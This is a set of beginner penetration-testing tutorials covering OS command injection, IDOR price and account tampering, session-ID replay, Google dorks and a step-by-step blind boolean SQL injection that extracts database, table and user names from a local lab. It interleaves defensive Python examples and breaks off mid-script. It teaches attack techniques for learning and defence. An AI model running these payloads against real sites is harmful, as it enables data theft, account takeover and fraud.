
Beginner Guide to OS Command Injection

Dynamic web applications may use scripts to call command-line functionality on the web server to process input received from the client, and unsafe user input can lead to OS command injection. OS command injection, also referred to as shell injection, arises when an attacker tries to run system-level commands through a vulnerable application in order to retrieve information about the web server or to gain unauthorised access to it.

Impact Analysis
Impact: Critical
Ease of Exploitability: Medium
Risk Rating: High


In this attack the attacker injects unwanted system-level commands so that he can fetch information about the web server; for example: ls, whoami, uname -a and so on.


Let's consider a scenario where a web application allows a user to PING the IP address of another user, so that it can confirm the host connection is alive. The given screenshot shows what the output will be when a host IP is submitted.

Verify parameters to inject data

The following parameters should be tested for command injection flaws, as the application may be using one of these parameters to build a command on the web server:

· GET: In this method input parameters are sent in the URL.
· POST: In this method input parameters are sent in the HTTP body.
· HTTP header: Applications frequently use header fields to identify end users and display the requested information to the user based on the value in the headers.
Some of the important header fields to check for command injection are:
· Cookie
· X-Forwarded-For
· User-Agent
· Referer

METACHARACTER
Using a vulnerability scanner, the attacker learns that the current web application is vulnerable to command injection and tries injecting unwanted system-level commands using metacharacters.

Metacharacters are symbolic operators used to separate the actual command from the unwanted one. The ampersand (&) is used as a separator that divides the authentic input from the command you are trying to inject.

It will be clearer in the following image, where the attacker injects his payload dir using a metacharacter; it retrieves the present directory of the web server.

As a result it dumps the output shown in the given image, where the application has processed the wrong user input as if it were valid.


OS Command Injection Operators

The developer may have set filters to block some metacharacters. This would block our injected data, so we need to try other metacharacters too, as shown in the following table:

Operator       Description
;              The semicolon is the most common metacharacter used to test an injection flaw. The shell runs all the commands in sequence, separated by the semicolon.
&              It separates multiple commands on one command line. It runs the first command, then the second command.
&&             It runs the command following && only if the preceding command succeeds.
|| (Windows)   It runs the command following || only if the preceding command fails: it runs the first command, then runs the second command only if the first did not complete successfully.
| (Linux)      Redirects the standard output of the first command to the standard input of the second command.
` (backtick)   The unquoting metacharacter forces the shell to interpret and run the command between the backticks. An example of this usage: variable="OS version `uname -a`" && echo "$variable"
()             Used to nest commands.
#              Used as a command-line comment.

Steps to exploit – OS Command Injection
Step 1: Identify the input field
Step 2: Understand the functionality
Step 3: Try the ping method (time delay)
Step 4: Use various operators to exploit OS command Injection

Type of Command Injection

Error based injection: When an attacker injects a command through an input parameter and the output of that command is displayed on the web page, it proves that the application is vulnerable to command injection. The displayed result might be an error or the actual output of the command you tried to run. An attacker then modifies and adds further commands, depending on the shell of the web server, and assembles information from the application.

Blind based injection: The results of the commands that you inject are not displayed to the attacker and no error messages are returned; it is similar to blind SQL injection. The attacker uses another technique, such as the time delay from step 3 above, to identify whether the command was really executed on the server.



Mitigation-OS Command Injection

· Strong server-side validation
· Implement a whitelist
· OS hardening
· Use built-in APIs for interacting with the OS if needed. More secure!!
· Avoid having the application call out directly to OS system commands
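As an added example (not code from the original post), the ping scenario above written twice in Python: the vulnerable handler that builds a shell string from the user's input, and a hardened handler that whitelists the host parameter and passes it as a separate argument without a shell. The function names and the whitelist rules are assumptions.

```python
"""The ping scenario: vulnerable handler beside its hardened form.

Added example, not from the original post. The function names and the
host whitelist rules below are assumptions; ping -c is the Linux flag.
"""
import ipaddress
import re
import subprocess

# The separators from the operator table above, plus redirection, quotes and newlines.
SHELL_METACHARACTERS = re.compile(r"[;&|`()#$<>\n\r'\"]")

# Plain hostnames only: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_vulnerable(host: str) -> str:
    """Builds the command string exactly as the vulnerable application does.
    Given '127.0.0.1 & dir' the shell runs ping and then dir."""
    return f"ping -c 1 {host}"


def is_safe_host(host: str) -> bool:
    """Whitelist check: accept only an IP literal or a well-formed hostname."""
    if SHELL_METACHARACTERS.search(host):
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def build_ping_argv(host: str) -> list:
    """Returns the argument vector for subprocess; raises on input that fails
    the whitelist. An argv list never passes through /bin/sh, so '&' stays literal."""
    if not is_safe_host(host):
        raise ValueError("rejected host parameter")
    return ["ping", "-c", "1", host]


def ping_hardened(host: str, timeout: float = 5.0) -> str:
    """Runs ping with shell=False on validated input and returns its output."""
    result = subprocess.run(build_ping_argv(host), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    payload = "127.0.0.1 & dir"   # constructed payload mirroring the post's screenshot
    print("vulnerable command string:", ping_vulnerable(payload))
    try:
        build_ping_argv(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
```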

Beginner Guide to Insecure Direct Object References

Insecure Direct Object References (IDOR) has been placed fourth on the OWASP Top 10 list of web application security risks since 2013. It allows an authorised user to obtain the information of other users, and can be found in any type of web application. Basically it allows requests to be made for specific objects through pages or services without proper verification of the requester's right to the content.

OWASP definition: Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

The application uses untested data in a SQL call that accesses account information.
Let's consider a scenario where a web application allows the logged-in user to change his secret value.
Here you can see that the secret value must refer to some user account in the database.


Currently user bee is logged in to the web server to change his secret value, but he is willing to perform a mischievous action that will change the secret value of another user.


Using Burp Suite we have captured the browser request; in the given image you can see the logged-in user is bee and the secret value is hello. Now manipulate the user into another user.

SQLquery = "SELECT * FROM useraccounts WHERE account = 'bee'";

Now let's change the user name to raj as shown in the given image. To perform this attack in an application you need at least two user accounts.

SQLquery = "SELECT * FROM useraccounts WHERE account = 'raj'";

Great!!! We have successfully changed the secret value for raj.
Note: on any official website the attacker will replace the user account with the admin account.

Let's take another scenario that looks quite familiar for most IDOR attacks.
Many times we book different orders online through a web application, for example bookmyshow.com for movie ticket booking.
Let's consider the same scenario in bWAPP for movie ticket booking, where I have booked 10 tickets at 15 EUR each.
Now let's confirm it and capture the browser request through Burp Suite.

Now you can see we have intercepted the request, where the highlighted text contains the number of tickets and the price of one ticket, i.e. 15 EUR; it means 150 EUR will be deducted from my (user) account. Now manipulate this price to your desired price.

I have changed it to 1 EUR, which means now only 10 EUR will be deducted from the account; you can observe it in the given image, then forward the request.

Awesome!!! We have booked the 10 tickets for 10 EUR only.
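Both scenarios above, the secret change and the ticket price, as an added Python example (not code from bWAPP or the original post): each vulnerable handler trusts the object reference or price sent by the client, and each hardened handler binds the operation to the logged-in session user and to a server-side price. The table, sample rows, order limit and function names are constructed for illustration.

```python
"""IDOR in the two scenarios above: changing a secret, and booking tickets.

Added example, not code from bWAPP or the original post. The table, the
sample rows, the order limit and the function names are constructed.
"""
import sqlite3

TICKET_PRICE_EUR = 15   # price from the post's scenario, kept on the server side
MAX_TICKETS = 10        # assumed order limit


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the two accounts the post says the attack needs."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE useraccounts (account TEXT PRIMARY KEY, "
               "secret TEXT, balance INTEGER)")
    db.executemany("INSERT INTO useraccounts VALUES (?, ?, ?)",
                   [("bee", "hello", 500), ("raj", "original", 500)])
    return db


def change_secret_vulnerable(db, account: str, new_secret: str) -> None:
    """Takes the account name from the request, so bee can rewrite raj's secret."""
    db.execute("UPDATE useraccounts SET secret = ? WHERE account = ?",
               (new_secret, account))


def change_secret_hardened(db, session_user: str, account: str, new_secret: str) -> None:
    """Authorisation check: only the owner of the object may modify it."""
    if account != session_user:
        raise PermissionError(f"{session_user} may not change the secret of {account}")
    db.execute("UPDATE useraccounts SET secret = ? WHERE account = ?",
               (new_secret, session_user))


def book_tickets_vulnerable(db, account: str, quantity: int, price_from_client: int) -> int:
    """Charges whatever price the intercepted request carries (15 EUR edited to 1 EUR)."""
    total = quantity * price_from_client
    db.execute("UPDATE useraccounts SET balance = balance - ? WHERE account = ?",
               (total, account))
    return total


def book_tickets_hardened(db, session_user: str, quantity: int) -> int:
    """The price is looked up on the server and the account comes from the session;
    the client only chooses a quantity, which is range-checked."""
    if not 1 <= quantity <= MAX_TICKETS:
        raise ValueError("quantity out of range")
    total = quantity * TICKET_PRICE_EUR
    db.execute("UPDATE useraccounts SET balance = balance - ? WHERE account = ?",
               (total, session_user))
    return total


def get_secret(db, account: str) -> str:
    return db.execute("SELECT secret FROM useraccounts WHERE account = ?",
                      (account,)).fetchone()[0]


def get_balance(db, account: str) -> int:
    return db.execute("SELECT balance FROM useraccounts WHERE account = ?",
                      (account,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    change_secret_vulnerable(db, "raj", "changed-by-bee")   # bee's session, raj's object
    print("raj's secret now:", get_secret(db, "raj"))
    try:
        change_secret_hardened(db, "bee", "raj", "changed-by-bee")
    except PermissionError as exc:
        print("hardened:", exc)
    print("charged:", book_tickets_vulnerable(db, "bee", 10, 1), "EUR (client price)")
    print("charged:", book_tickets_hardened(db, "bee", 10), "EUR (server price)")
```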

Beginner Guide to Understand Cookies and Session Management

A cookie is a small piece of data sent by a server to a browser and stored on the user's computer while the user is browsing. Cookies are produced and shared between the browser and the server using HTTP headers.
It allows the server to store and retrieve data from the client. It is stored in a file on the client side, and the maximum size of a cookie that can be stored is limited to 4K in any web browser. Cookies have a limited lifetime because they carry an expiry date and time, and they can expire as soon as the browser is closed.
Example: when you visit YouTube and search for Bollywood songs, this gets noted in your browsing history; the next time you open YouTube in your browser, the cookie reads your browsing history and you will be shown Bollywood songs on your YouTube homepage.

Creating cookie
The setcookie() function is used to send the cookie along with the rest of the HTTP headers.

When a developer creates a cookie with the setcookie function, he must specify at least three arguments. These arguments are setcookie(name, value, expiration);

Cookie Attributes

1. Name: Specifies the name of the cookie.
2. Value: Specifies the value of the cookie.
3. Secure: Specifies whether or not the cookie should only be transmitted over a secure HTTPS connection. TRUE indicates that the cookie will only be set if a secure connection exists. Default is FALSE.
4. Domain: Specifies the domain name of the cookie. To make the cookie available on all subdomains of example.com, set domain to "example.com". Setting it to www.example.com will make the cookie available only in the www subdomain.
5. Path: Specifies the server path of the cookie. If set to "/", the cookie will be available within the entire domain. If set to "/php/", the cookie will only be available within the php directory and all sub-directories of php. The default value is the current directory in which the cookie is being set.
6. HttpOnly: If set to TRUE the cookie will be accessible only through the HTTP protocol (the cookie will not be accessible to scripting languages). This setting can help reduce identity theft through XSS attacks. Default is FALSE.
7. Expires: Specifies when the cookie expires. The value time()+86400*30 will set the cookie to expire in 30 days. If this parameter is omitted or set to 0, the cookie will expire at the end of the session (when the browser closes). Default is 0.


Necessity of Cookies
Cookies can be used for various purposes:
· Identifying unique visitors.
· HTTP is a stateless protocol; cookies permit us to track the state of the application using small files stored on the user's computer.
· Recording the time each user spends on a website.

Type of cookies
Session Cookie
This type of cookie dies when the browser is closed because it is stored in the browser's memory. They are used on e-commerce websites so the user can continue browsing without losing what he put in his cart. If the user visits the website again after closing the browser, these cookies will not be available. They are safer, because nothing other than the browser can access them.

Persistent Cookie
These cookies do not depend on the browser session because they are stored in a file on the user's computer. If the user closes the browser and then accesses the website again, these cookies will still be available. The lifetime of these cookies is specified in the cookie itself (as the expiration time). They are less secure.

Third Party Cookie
A cookie set by a domain name that is not the domain name that appears in the browser address bar. These cookies are mainly used for tracking user browsing patterns and/or finding advertisement recommendations for the user.

Secure Cookie
A secure cookie can only be transmitted over an encrypted connection. A cookie is made secure by adding the secure flag to the cookie. Browsers which support the secure flag will only send cookies with the secure flag when the request is going to an HTTPS page.

HTTP Only Cookie
It informs the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly prohibited. This is an important security protection for session cookies.

Zombies Cookie
A zombie cookie is an HTTP cookie that is recreated after deletion. Cookies are recreated from backups stored outside the web browser's dedicated cookie storage.

Sessions
PHP session: when a user makes a change in the web application, like signing in or out, the server does not know who that person is. To solve this problem PHP sessions were introduced, which store user information to be used across several web pages.
Session variables hold information about one single user and are available to all pages in one application.
Example: login ID, user name and password.

Session ID
PHP code generates a unique identifier for that specific session in the form of a hash, a random string of 32 hexadecimal characters such as 5f7dok65iif989fwrmn88er47gk834, known as the PHP session ID (PHPSESSID).

A session ID or token is a unique number used to identify a user who has logged into a website. The session ID is stored on the server and is assigned to a specific user for the duration of that user's visit (session). The session ID can be stored as a cookie, form field, or URL.

Explanation:
Now let's have a look at this picture and see what it says:
In the given picture we can clearly see there are three components: the HTTP client, the HTTP server and the database (holding the session ID).

Step 1: the client sends a request to the server via POST or GET.
Step 2: a session ID is created on the web server. The server saves the session ID into the database and, using the Set-Cookie header, sends the session ID to the client browser in the response.
Step 3: the cookie with the session ID stored in the client browser is sent back to the server, where the server matches it against the database and sends the response HTTP 200 OK.
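The three steps above and the cookie attributes listed earlier, as an added Python example (not the PHP session handling the post describes): a server-side session table keyed by a 32-hex-character ID from a CSPRNG, a Set-Cookie header carrying the Secure and HttpOnly attributes, and a rotate step that issues a fresh ID after login so an ID observed earlier does not remain valid. The store, cookie name and helper names are assumptions.

```python
"""Session creation, lookup and cookie issuing for the flow described above.

Added example, not the post's PHP code. The in-memory store, the cookie
name and the helper names are assumptions.
"""
import secrets
import time
from http.cookies import SimpleCookie

SESSION_COOKIE = "PHPSESSID"   # cookie name seen in the post's DVWA capture
SESSION_TTL = 86400 * 30       # 30 days, as in the expires example above


class SessionStore:
    """Server-side session table: session ID -> user data (steps 1 to 3 above)."""

    def __init__(self):
        self._sessions = {}

    def create(self, user: str, now=None) -> str:
        """Step 2: mint an unguessable ID (16 random bytes = 32 hex chars)."""
        now = time.time() if now is None else now
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": user, "created": now,
                               "expires": now + SESSION_TTL}
        return sid

    def lookup(self, sid: str, now=None):
        """Step 3: match the presented ID against the store; expired IDs are dropped."""
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None or entry["expires"] <= now:
            self._sessions.pop(sid, None)
            return None
        return entry["user"]

    def rotate(self, old_sid: str, now=None):
        """Issue a fresh ID after login; an ID captured before login becomes useless."""
        user = self.lookup(old_sid, now)
        if user is None:
            return None
        del self._sessions[old_sid]
        return self.create(user, now)

    def destroy(self, sid: str) -> None:
        """Logout: remove the server-side record so the cookie value is dead."""
        self._sessions.pop(sid, None)


def set_cookie_header(sid: str, max_age: int = SESSION_TTL) -> str:
    """Build the Set-Cookie header value with the Secure and HttpOnly attributes."""
    cookie = SimpleCookie()
    cookie[SESSION_COOKIE] = sid
    morsel = cookie[SESSION_COOKIE]
    morsel["path"] = "/"
    morsel["max-age"] = max_age
    morsel["secure"] = True        # only sent over HTTPS
    morsel["httponly"] = True      # not readable from JavaScript (limits XSS theft)
    morsel["samesite"] = "Lax"
    return morsel.OutputString()


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("bee")
    print("Set-Cookie:", set_cookie_header(sid))
    print("lookup:", store.lookup(sid))
    fresh = store.rotate(sid)
    print("old ID valid after rotate:", store.lookup(sid) is not None)
    print("new ID valid after rotate:", store.lookup(fresh) is not None)
```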


Session hijacking

As we know, different users have unique session IDs; when an attacker sniffs the session via a man-in-the-middle attack or via XSS and steals the session ID or session token, this is called session hijacking. When the attacker sends the stolen session ID to the web server, the server matches that ID against the session IDs stored in the database. If they match, the server replies with HTTP 200 OK and the attacker successfully gets access without submitting proper identification.

Session hijacking tutorial
For this tutorial I have targeted DVWA; here the cookie name is dvwaSession.
Note: the session ID for this page will change every time we close the browser.

Now capture the browser request using burp suite.


From the given image we can see the cookie holds PHPSESSID=P38kq30vi6arr0b321p2uv86k0; now send this intercepted data to Repeater to observe its response.


In the response you can see the highlighted data shows Set-Cookie: dvwaSession=1, along with an HTTP 200 OK response from the server side.

According to the developer, a new session ID is generated by the server each time, but the attacker sniffs this session ID P38kq30vi6arr0b321p2uv86k0 for an unauthorised login.


Next time we receive another session ID when data is intercepted through Burp Suite, i.e. PHPSESSID=gutnu601knp4qsrgfdb4ad0te3; again send this intercepted data to Repeater to observe its response.


But before we look at its response, replace the new PHPSESSID with the old PHPSESSID.

From the given image you can observe that we have replaced the session ID and then generated its response, in which Set-Cookie: dvwaSession=6 and an HTTP 200 OK response come from the server side.


Now change the value inside intercepted data and then forward this request to the server.


Session vs cookies

Session                                                            | Cookies
Data are stored on the server                                      | Data are stored in the client's browser
Session data are more secure: they never travel with HTTP requests | Cookies travel with each and every HTTP request
You can store objects (large amounts of data)                      | You can store strings only (max size 4 KB)
Sessions cannot be used for future reference                       | Cookies are mostly used for future reference

Beginner Guide to Google Dorks (Part 1)

Google is a tool which helps in finding what one is looking for. Google operators are the terms provided to us for making our search easy and refined. These operators, also termed advanced Google operators, provide exact information. They reduce the search time by instantly providing the information, as we don't have to move from one page to another. These operators work as a query.
The basic syntax is -> operator:term to be searched
Some of these operators are listed below:
Intitle
e.g. -> intitle:hackingarticles

This query will return the pages which include the term "hackingarticles" in their title.


inurl
e.g. -> inurl:hackingarticles
This query will return the pages which include the term hackingarticles in their URL.


Related
e.g. -> related:pentest
It will provide results related to our query, i.e. pentest.


Allintext
This operator locates a particular string in the text of the page.
e.g. -> allintext:rajchandel
The above query will return only those pages which include the term rajchandel in their text.


Filetype
e.g. -> www.kccitm.edu.in filetype:pdf
This query searches for files of the provided extension only. The above query will search only the PDF files present on the given site.


Cache
This operator will show the cached version of the web page instead of the current one. It is followed by the URL of the page whose cached version we want.



Define
This operator provides the definition of a term as a result.
e.g. -> define:pentest


Link
This operator helps you search for pages which link to other pages. It is given a URL instead of a term to search.
e.g. -> link:www.kccitm.edu.in


Allintitle
This operator is slightly different from the intitle operator.
With the intitle operator there is no compulsion for every term in the query to be present in the title, whereas with the allintitle operator every term in the query must be present in the title.
e.g. -> allintitle:hackingarticles


ADVANTAGES:
1. These operators provide the exact results which we are looking for.
2. There is no wastage of time, as there is no redirecting from one page to another.
3. There are different operators for every task, e.g. phonebook to obtain residential and business phone numbers, and so on.

DISADVANTAGES
1. There are some operators which do not mix with others in the same query, e.g. the allintitle and allintext operators.






BASIC GUIDELINES TO USE GOOGLE OPERATORS
1. There should be no space between the operator, the colon and the search term, as violating this rule will not generate the desired result.
2. If the search term is a phrase, then there should be no space between the operator, the colon and the first quote of the phrase.
3. Some advanced operators cannot be combined with others, such as allintitle, allintext etc.
4. Boolean operators and special characters such as 'OR' and '+' can be used in the queries, but they should not be placed in the way of the colon.
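The four guidelines above turned into a checker, as an added Python example (not code from the original article): it tokenises a query, finds the operators described on this page, and reports spacing around a colon, an allintitle/allintext operator combined with another, or a Boolean operator wedged against a colon. The operator list is drawn from this page; the function names are assumptions.

```python
"""Checks a Google query against the four guidelines listed above.

Added example, not from the original article. The operator set comes from
the operators described on this page; the function names are assumptions.
"""
import re

OPERATORS = {"intitle", "inurl", "related", "allintext", "filetype", "cache",
             "define", "link", "allintitle", "site", "phonebook"}
# Guideline 3: these cannot be combined with other operators in one query.
EXCLUSIVE = {"allintitle", "allintext"}

# Guidelines 1 and 2: whitespace between operator and colon, or after the colon
# (which also covers a space before the opening quote of a phrase).
SPACED_COLON_RE = re.compile(r"\b(\w+)\s+:|\b(\w+):\s+")
# Guideline 4: a Boolean operator or '+' placed directly against a colon.
BLOCKED_COLON_RE = re.compile(r"\b(OR|AND)\s*:|\+\s*:|:\s*(OR|AND)\b")
# Tokens are quoted phrases or runs of non-space characters.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def operators_in(query: str) -> list:
    """Operators used in the query, in order of appearance."""
    found = []
    for token in TOKEN_RE.findall(query):
        name, sep, _term = token.partition(":")
        if sep and name.lower() in OPERATORS:
            found.append(name.lower())
    return found


def validate_query(query: str) -> list:
    """Return the guideline violations found; an empty list means the query is well formed."""
    problems = []
    for m in SPACED_COLON_RE.finditer(query):
        op = (m.group(1) or m.group(2)).lower()
        if op in OPERATORS:
            problems.append(f"space around the colon of '{op}' (guidelines 1 and 2)")
    ops = operators_in(query)
    for op in ops:
        if op in EXCLUSIVE and len(ops) > 1:
            problems.append(f"'{op}' cannot be combined with other operators (guideline 3)")
            break
    if BLOCKED_COLON_RE.search(query):
        problems.append("Boolean operator or '+' placed in the way of a colon (guideline 4)")
    return problems


if __name__ == "__main__":
    for q in ["intitle:hackingarticles", "intitle: hackingarticles",
              'allintext: "raj chandel"', "allintitle:hackingarticles inurl:blog"]:
        print(repr(q), "->", validate_query(q) or "ok")
```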
HOW HACKERS USE GOOGLE OPERATORS
Everyone uses Google, but most people don't know how to make full use of it.
Google operators are very famous among hackers, and they take full benefit of them.
Sensitive information needed by hackers which is not easily retrieved through a common search can be produced with the help of Google operators.
If a hacker wants to retrieve a PDF file from a particular site, then he/she has to use the operator "filetype" with the URL as well as the extension of the file.
A hacker can retrieve the pages of a specified domain with the help of the operator "site". This operator is followed by the separating colon and the domain name.
It's an easy tool for a hacker to get the exact outcome in just a click.
Thanks for reading the article. In the next article we will be discussing more Google dorks for web penetration testing.

Author: Shrishtee Suman is a Technical Writer at Hacking Articles; she is pursuing a B.Tech in CS. Her interests are mainly in web penetration testing and vulnerability research. Contact Here

Beginner Guide to SQL Injection Boolean Based (Part 2)

There are so many ways to hack a database using SQL injection, as we saw in our previous tutorials: error based attacks, login form based attacks and many other types of attack used to retrieve information from inside the database. In the same way, today we will learn a new type of SQL injection attack known as the blind Boolean based attack.

An attacker always checks for SQL injection vulnerability using a single quote (') inside the URL to break the statement in order to receive a SQL error message. It is a fight between developer and attacker: the developer increases the security level and the attacker tries to break it. This time the developer has blocked error messages from appearing as output on the website. Hence, even if the database is vulnerable to SQL injection, the attacker does not obtain any error message on the website. The attacker will try to confirm whether the database is vulnerable to blind SQL injection by evaluating the results of various queries which return either TRUE or FALSE.

Let’s start!!
Using Dhakkan we will demonstrate blind SQL injection.
Lesson 8
Lesson 8 is about blind Boolean based injection, therefore first we need to open http://localhost:81/sqli/Less-8/?id=1 in the browser; this will send the following query to the database.

SELECT * from table_name WHERE id=1


As output it displays "you are in" in yellow text on the web page, as shown in the given image.


When the attacker tries to break this query using a single quote (') http://localhost:81/sqli/Less-8/?id=1' or any other technique, he is not able to find any error message. Moreover, the yellow text disappears if the attacker tries to inject an invalid query, which is also shown in the given image.


Then the attacker goes for blind SQL injection to make sure that the injected query returns an answer of either true or false.
http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+
SELECT * from table_name WHERE id=1' AND 1=1

Now the database tests the given condition, whether 1 is equal to 1; if the query is valid it returns TRUE. From the screenshot you can see we have got the yellow text "you are in" again, which means our query is valid.


In the next query we check the URL
http://localhost:81/sqli/Less-8/?id=1' AND 1=0 --+
SELECT * from table_name WHERE id=1' AND 1=0

Now it tests the given condition, whether 1 is equal to 0; as we know 1 is not equal to 0, hence the database answers the query as FALSE. The screenshot confirms it when the yellow text disappears again.

Hence it confirms that the web application is vulnerable to blind SQL injection. Using true and false conditions we are going to retrieve database information.


Length of database string
The following query asks for the length of the database name string. For example, if the name of the database is IGNITE, which contains 6 letters, the length of the string for database IGNITE is equal to 6.

Similarly we will inject the query given below, which asks whether the length of the database string is equal to 1; in response to that query it answers by returning TRUE or FALSE through the text "you are in".

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 1--+

From the given screenshot you can see the text disappears again, which means it has returned FALSE to reply NO, the length of the database string is not equal to 1.



http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 2--+

Again it tests whether the length of the database string is equal to 2; it returns FALSE to reply NO, the length of the database string is not equal to 2. Repeat the same step until we receive TRUE for string length 3/4/5 and so on.



http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 8--+

When I tested for a string length equal to 8, it answered TRUE and as a result the yellow text "you are in" appeared again.



As we know, a computer does not understand human language; it reads only binary, therefore we will use ASCII codes. The ASCII code associates an integer value with every symbol in the character set, such as letters, digits, punctuation marks, special characters, and control characters.

For example, look at the following string's ASCII codes:

1 = I = 73
2 = G = 71
3 = N = 78
4 = I = 73
5 = T = 84
6 = E = 69


Further we will enumerate the database name using ASCII characters for all 8 positions of the string.
The next query asks the database to test the condition whether the first character of the database name is greater than 100, using ascii and substr.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 100--+

It reflects a TRUE condition; hence if you match it against the ASCII table you will observe that the lowercase letters run from around 100 up to 122.



http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 120--+

Similarly it tests again whether the first letter is greater than 120. But this time it returns FALSE, which means the first letter is greater than 100 and less than 120.



http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 101--+

Now it checks whether the first character is greater than 101; again we got FALSE.



We performed this test from 101 till 114 but received FALSE every time.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 114--+


http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115--+

Finally we receive a TRUE reply at 115, which means the first character is equal to 115, where 115 = 's'.


Similarly test for the second character: repeat the above step, replacing the first position with the second.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) > 100--+



I received a TRUE reply at 101, which means the second character is equal to 101, and 101 = 'e'.
Similarly I performed this for all eight characters and got the following result:

1 = s = 115
2 = e = 101
3 = c =99
4 = u =117
5 = r =114
6 = i = 105
7 = t = 116
8 = y = 121



Table string length

We have to use the same technique for enumerating information about the tables from inside the database. The given query tests the condition whether the length of the string for the first table name is greater than 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.



Given query will test the condition whether the length of string for first table is greater than 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 6 --+

In reply we receive FALSE and text “you are in” disappears again from the web site.



Given query will test the condition whether the length of string for first table is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

Similarly I tested the second and third tables using the same technique, changing only the table number in the same query.



Similarly, enumerate the fourth table's information using the following query to test the condition whether the length of the string for the fourth table name is equal to 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

As we did for database enumeration using ASCII codes, we are going to use the same technique to retrieve the table name.



Further we will enumerate the 4th table name using ASCII characters for all 5 positions of the string.
The next query asks the database to test the condition whether the first character of the table name is greater than 115, using ascii and substr.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 115 --+

It reflects a TRUE condition: the text "you are in" appears again on the website, so match it against the ASCII table.



The next query asks the database to test the condition whether the first character of the table name is greater than 120, using ascii and substr.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 120 --+

But this time it returns FALSE, which means the first letter is greater than 115 and less than 120.



Proceeding towards equating the character with ASCII codes between 115 and 120. The next query asks the database to test the condition whether the first character of the table name is equal to 116, using ascii and substr.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 116 --+

It returns FALSE; the text disappears.



http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

It returns TRUE; the text appears.

Similarly we tested the remaining characters and received the following result:
1 = u = 117
2 = s = 115
3 = e = 101
4 = r = 114
5 = s = 115



User Name Enumeration

Using the same method we are going to enumerate the length of the username string from inside the table users.
The query given below tests whether the string length is equal to 4 or not.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select username from users limit 0,1))) = 4 --+

It replies TRUE with the help of the yellow text.



Using the same method we are going to enumerate the username from inside the table users.

The query given below tests the first character using its ASCII code.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 --+

We received FALSE, which means the first character must be less than 100.


http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 50 --+

We received TRUE, which means the first character must be more than 50.



Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 60 --+

We received TRUE, which means the first character must be more than 60.




Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 70 --+

We received FALSE, which means the first character is less than 70.
Hence the first character must lie between 60 and 70 in ASCII code.



Proceeding towards comparing the character with different ASCII codes using the following query.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+
This time we successfully receive TRUE, with the text "you are in" appearing.
Similarly I tested all four characters in order to retrieve the username:
1 = D = 68
2 = u = 117
3 = m = 109
4 = b = 98

Hence today we learned how an attacker hacks a database using blind SQL injection.

!!Try yourself to retrieve the password for user dumb!!
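From the defender's side, the probing walked through above leaves a very recognisable trail in the web server's access log: many requests to one path from one client, differing only in the injected comparison, with the response alternating between two sizes (the page with and without "you are in"). As an added Python example (not code from the original post), a small log analyser that decodes the request URLs, matches the signatures of the queries used in this tutorial, and flags clients that send several such probes; the log lines are constructed from this tutorial's URLs and the function names are assumptions.

```python
"""Spotting boolean-based blind probing in web server access logs.

Added example, not from the original post. The log lines are constructed
from the URLs used in this tutorial; all function names are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Signatures of the technique walked through above, matched on the decoded query string.
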